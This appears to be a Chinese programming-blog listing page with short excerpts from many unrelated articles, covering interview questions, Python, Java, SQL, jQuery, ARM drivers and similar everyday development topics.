【华为OD技术面试真题 - 技术面】- python八股文真题题库（4) 算法大师华为od 面试 python
华为OD面试真题精选专栏：华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选**1.Python中的`with`**用途和功能自动资源管理示例：文件操作上下文管理协议示例代码工作流程解析优点2.\_\_new\_\_和**\_\_init\_\_**区别__new____init__区别总结3.**切片（Slicing）操作**基本切片语法
python os 环境变量 CV矿工 python 开发语言 numpy
环境变量：环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里，比如数据库密码，个人账户密码，如果写进自己本机的环境变量里，程序用的时候通过os.environ.get（）取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量：os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
Python爬虫解析工具之xpath使用详解 eqa11 python 爬虫开发语言
文章目录Python爬虫解析工具之xpath使用详解一、引言二、环境准备1、插件安装2、依赖库安装三、xpath语法详解1、路径表达式2、通配符3、谓语4、常用函数四、xpath在Python代码中的使用1、文档树的创建2、使用xpath表达式3、获取元素内容和属性五、总结Python爬虫解析工具之xpath使用详解一、引言在Python爬虫开发中，数据提取是一个至关重要的环节。xpath作为一门
ARM驱动学习之5 LEDS驱动 JT灬新一嵌入式 C 底层 arm开发学习单片机
ARM驱动学习之5LEDS驱动知识点：•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点：DRIVER_NAME和DEVICE_NAME匹配。实现步骤：1.加入需要的头文件：//Linux平台的gpio头文件#include//三
【华为OD技术面试真题精选 - 非技术题】 -HR面，综合面_华为od hr面一个射手座的程序媛程序员华为od 面试职场和发展
最后的话最近很多小伙伴找我要Linux学习资料，于是我翻箱倒柜，整理了一些优质资源，涵盖视频、电子书、PPT等共享给大家！资料预览给大家整理的视频资料：给大家整理的电子书资料：如果本文对你有帮助，欢迎点赞、收藏、转发给朋友，让我有持续创作的动力！网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化的资料的朋友，可以点击这里获
【华为OD技术面试真题 - 技术面】- python八股文真题题库（1）算法大师华为od 面试 python
华为OD面试真题精选专栏：华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.数据预处理流程数据预处理的主要步骤工具和库2.介绍线性回归、逻辑回归模型线性回归（LinearRegression）模型形式：关键点：逻辑回归（LogisticRegression）模型形式：关键点：参数估计与评估：3.python浅拷贝及深拷贝浅拷贝（Shal
nosql数据库技术与应用知识点皆过客，揽星河 NoSQL nosql 数据库大数据数据分析数据结构非关系型数据库
Nosql知识回顾大数据处理流程数据采集(flume、爬虫、传感器)数据存储(本门课程NoSQL所处的阶段)Hdfs、MongoDB、HBase等数据清洗(入仓)Hive等数据处理、分析(Spark、Flink等)数据可视化数据挖掘、机器学习应用(Python、SparkMLlib等)大数据时代存储的挑战(三高)高并发(同一时间很多人访问)高扩展(要求随时根据需求扩展存储)高效率(要求读写速度快)
简介Shell、zsh、bash zhaosuningsn Shell zsh bash shell linux bash
Shell是Linux和Unix的外壳，类似衣服，负责外界与Linux和Unix内核的交互联系。例如接收终端用户及各种应用程序的命令，把接收的命令翻译成内核能理解的语言，传递给内核，并把内核处理接收的命令的结果返回给外界，即Shell是外界和内核沟通的桥梁或大门。Linux和Unix提供了多种Shell，其中有种bash，当然还有其他好多种。Mac电脑中不但有bash，还有一个zsh，预装的，据说
ztree异步加载 3213213333332132 JavaScript Ajax json Web ztree
相信新手用ztree的时候,对异步加载会有些困惑，我开始的时候也是看了API花了些时间才搞定了异步加载，在这里分享给大家。我后台代码生成的是json格式的数据，数据大家按各自的需求生成，这里只给出前端的代码。设置setting，这里只关注async属性的配置 var setting = { //异步加载配置
thirft rpc 具体调用流程 BlueSkator 中间件 rpc thrift
Thrift调用过程中，Thrift客户端和服务器之间主要用到传输层类、协议层类和处理类三个主要的核心类，这三个类的相互协作共同完成rpc的整个调用过程。在调用过程中将按照以下顺序进行协同工作：（1）将客户端程序调用的函数名和参数传递给协议层（TProtocol），协议
异或运算推导, 交换数据 dcj3sjt126com PHP 异或 ^
/* * 5 0101 * 9 1010 * * 5 ^ 5 * 0101 * 0101 * ----- * 0000 * 得出第一个规律: 相同的数进行异或, 结果是0 * * 9 ^ 5 ^ 6 * 1010 * 0101 * ---- * 1111 * * 1111 * 0110 * ---- * 1001
事件源对象周华华 JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
MySql配置及相关命令 g21121 mysql
MySQL安装完毕后我们需要对它进行一些设置及性能优化，主要包括字符集设置，启动设置，连接优化，表优化，分区优化等等。一修改MySQL密码及用户
[简单]poi删除excel 2007超链接 53873039oycg Excel
采用解析sheet.xml方式删除超链接，缺点是要打开文件2次,代码如下: public void removeExcel2007AllHyperLink(String filePath) throws Exception { OPCPackage ocPkg = OPCPac
Struts2添加 open flash chart 云端月影
准备以下开源项目： 1. Struts 2.1.6 2. Open Flash Chart 2 Version 2 Lug Wyrm Charmer (28th, July 2009) 3. jofc2，这东西不知道是没做好还是什么意思，好像和ofc2不怎么匹配，最好下源码，有什么问题直接改。 4. log4j 用eclipse新建动态网站，取名OFC2Demo，将Struts2 l
spring包详解 aijuans spring
下载的spring包中文件及各种包众多，在项目中往往只有部分是我们必须的，如果不清楚什么时候需要什么包的话，看看下面就知道了。 aspectj目录下是在Spring框架下使用aspectj的源代码和测试程序文件。Aspectj是java最早的提供AOP的应用框架。 dist 目录下是Spring 的发布包，关于发布包下面会详细进行说明。 docs&nb
网站推广之seo概念 antonyup_2006 算法 Web 应用服务器搜索引擎 Google
持续开发一年多的b2c网站终于在08年10月23日上线了。作为开发人员的我在修改bug的同时，准备了解下网站的推广分析策略。所谓网站推广，目的在于让尽可能多的潜在用户了解并访问网站，通过网站获得有关产品和服务等信息，为最终形成购买决策提供支持。网站推广策略有很多，seo，email，adv
单例模式,sql注入,序列百合不是茶单例模式序列 sql注入预编译
序列在前面写过有关的博客,也有过总结,但是今天在做一个JDBC操作数据库的相关内容时需要使用序列创建一个自增长的字段居然不会了,所以将序列写在本篇的前面 1,序列是一个保存数据连续的增长的一种方式; 序列的创建; CREATE SEQUENCE seq_pro 2 INCREMENT BY 1 -- 每次加几个 3
Mockito单元测试实例 bijian1013 单元测试 mockito
Mockito单元测试实例： public class SettingServiceTest { private List<PersonDTO> personList = new ArrayList<PersonDTO>(); @InjectMocks private SettingPojoService settin
精通Oracle10编程SQL(9)使用游标 bijian1013 oracle 数据库 plsql
/* *使用游标 */ --显示游标 --在显式游标中使用FETCH...INTO语句 DECLARE CURSOR emp_cursor is select ename,sal from emp where deptno=1; v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; begin ope
【Java语言】动态代理 bit1129 java语言
JDK接口动态代理 JDK自带的动态代理通过动态的根据接口生成字节码(实现接口的一个具体类)的方式，为接口的实现类提供代理。被代理的对象和代理对象通过InvocationHandler建立关联 package com.tom; import com.tom.model.User; import com.tom.service.IUserService;
Java通信之URL通信基础白糖_ java jdk webservice 网络协议 ITeye
java对网络通信以及提供了比较全面的jdk支持，java.net包能让程序员直接在程序中实现网络通信。在技术日新月异的现在，我们能通过很多方式实现数据通信，比如webservice、url通信、socket通信等等，今天简单介绍下URL通信。学习准备：建议首先学习java的IO基础知识 URL是统一资源定位器的简写，URL可以访问Internet和www，可以通过url
博弈Java讲义 - Java线程同步 (1) boyitech java 多线程同步锁
在并发编程中经常会碰到多个执行线程共享资源的问题。例如多个线程同时读写文件，共用数据库连接，全局的计数器等。如果不处理好多线程之间的同步问题很容易引起状态不一致或者其他的错误。同步不仅可以阻止一个线程看到对象处于不一致的状态，它还可以保证进入同步方法或者块的每个线程，都看到由同一锁保护的之前所有的修改结果。处理同步的关键就是要正确的识别临界条件（cri
java-给定字符串，删除开始和结尾处的空格，并将中间的多个连续的空格合并成一个。 bylijinnan java
public class DeleteExtraSpace { /** * 题目：给定字符串，删除开始和结尾处的空格，并将中间的多个连续的空格合并成一个。 * 方法1.用已有的String类的trim和replaceAll方法 * 方法2.全部用正则表达式，这个我不熟 * 方法3.“重新发明轮子”，从头遍历一次 */ public static v
An error has occurred.See the log file错误解决！ Kai_Ge MyEclipse
今天早上打开MyEclipse时，自动关闭！弹出An error has occurred.See the log file错误提示！很郁闷昨天启动和关闭还好着！！！打开几次依然报此错误，确定不是眼花了！打开日志文件！找到当日错误文件内容： --------------------------------------------------------------------------
[矿业与工业]修建一个空间矿床开采站要多少钱? comsci
地球上的钛金属矿藏已经接近枯竭........... 我们在冥王星的一颗卫星上面发现一些具有开采价值的矿床..... 那么,现在要编制一个预算,提交给财政部门..
解析Google Map Routes dai_lm google api
为了获得从A点到B点的路劲，经常会使用Google提供的API，例如 [url] http://maps.googleapis.com/maps/api/directions/json?origin=40.7144,-74.0060&destination=47.6063,-122.3204&sensor=false [/url] 从返回的结果上，大致可以了解应该怎么走，但
SQL还有多少“理所应当”？ datamachine sql
转贴存档，原帖地址：http://blog.chinaunix.net/uid-29242841-id-3968998.html、http://blog.chinaunix.net/uid-29242841-id-3971046.html！ ------------------------------------华丽的分割线--------------------------------
Yii使用Ajax验证时，如何设置某些字段不需要验证 dcj3sjt126com Ajax yii
经常像你注册页面,你可能非常希望只需要Ajax去验证用户名和Email,而不需要使用Ajax再去验证密码,默认如果你使用Yii 内置的ajax验证Form,例如: $form=$this->beginWidget('CActiveForm', array( 'id'=>'usuario-form',&
使用git同步网站代码 dcj3sjt126com crontab git
转自:http://ued.ctrip.com/blog/?p=3646?tn=gongxinjun.com 管理一网站，最开始使用的虚拟空间，采用提供商支持的ftp上传网站文件，后换用vps，vps可以自己搭建ftp的，但是懒得搞，直接使用scp传输文件到服务器，现在需要更新文件到服务器，使用scp真的很烦。发现本人就职的公司，采用的git+rsync的方式来管理、同步代码，遂
sql基本操作蕃薯耀 sql sql基本操作 sql常用操作
sql基本操作 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月1日 17:30:33 星期一 &
Spring4+Hibernate4+Atomikos3.3多数据源事务管理 hanqunfeng Hibernate4
Spring3+后不再对JTOM提供支持，所以可以改用Atomikos管理多数据源事务。Spring2.5+Hibernate3+JTOM参考：http://hanqunfeng.iteye.com/blog/1554251Atomikos官网网站：http://www.atomikos.com/ 一.pom.xml <dependency> <
jquery中两个值得注意的方法one()和trigger()方法 jackyrong trigger
在jquery中，有两个值得注意但容易忽视的方法，分别是one()方法和trigger()方法,这是从国内作者<<jquery权威指南》一书中看到不错的介绍 1） one方法 one方法的功能是让所选定的元素绑定一个仅触发一次的处理函数，格式为 one(type,${data},fn) &nb
拿工资不仅仅是让你写代码的 lampcy 工作面试咨询
这是我对团队每个新进员工说的第一件事情。这句话的意思是，我并不关心你是如何快速完成任务的，哪怕代码很差，只要它像救生艇通气门一样管用就行。这句话也是我最喜欢的座右铭之一。这个说法其实很合理：我们的工作是思考客户提出的问题，然后制定解决方案。思考第一，代码第二，公司请我们的最终目的不是写代码，而是想出解决方案。话粗理不粗。付你薪水不是让你来思考的，也不是让你来写代码的，你的目的是交付产品
架构师之对象操作----------对象的效率复制和判断是否全为空 nannan408 架构师
1.前言。如题。 2.代码。 (1)对象的复制，比spring的beanCopier在大并发下效率要高，利用net.sf.cglib.beans.BeanCopier Src src=new Src(); BeanCopier beanCopier = BeanCopier.create(Src.class, Des.class, false);
ajax 被缓存的解决方案 Rainbow702 JavaScript jquery Ajax cache 缓存
使用jquery的ajax来发送请求进行局部刷新画面，各位可能都做过。今天碰到一个奇怪的现象，就是，同一个ajax请求，在chrome中，不论发送多少次，都可以发送至服务器端，而不会被缓存。但是，换成在IE下的时候，发现，同一个ajax请求，会发生被缓存的情况，只有第一次才会被发送至服务器端，之后的不会再被发送。郁闷。解决方法如下： ① 直接使用 JQuery提供的 “cache”参数，
修改date.toLocaleString()的警告 tntxia String
我们在写程序的时候，经常要查看时间，所以我们经常会用到date.toLocaleString()，但是date.toLocaleString()是一个过时的API，代替的方法如下： package com.tntxia.htmlmaker.util; import java.text.SimpleDateFormat; import java.util.
项目完成后的小总结 xiaomiya js 总结项目
项目完成了，突然想做个总结但是有点无从下手了。做之前对于客户端给的接口很模式。然而定义好了格式要求就如此的愉快了。先说说项目主要实现的功能吧 1，按键精灵 2，获取行情数据 3，各种input输入条件判断 4，发送数据（有json格式和string格式） 5，获取预警条件列表和预警结果列表， 6，排序， 7，预警结果分页获取 8，导出文件（excel，text等） 9，修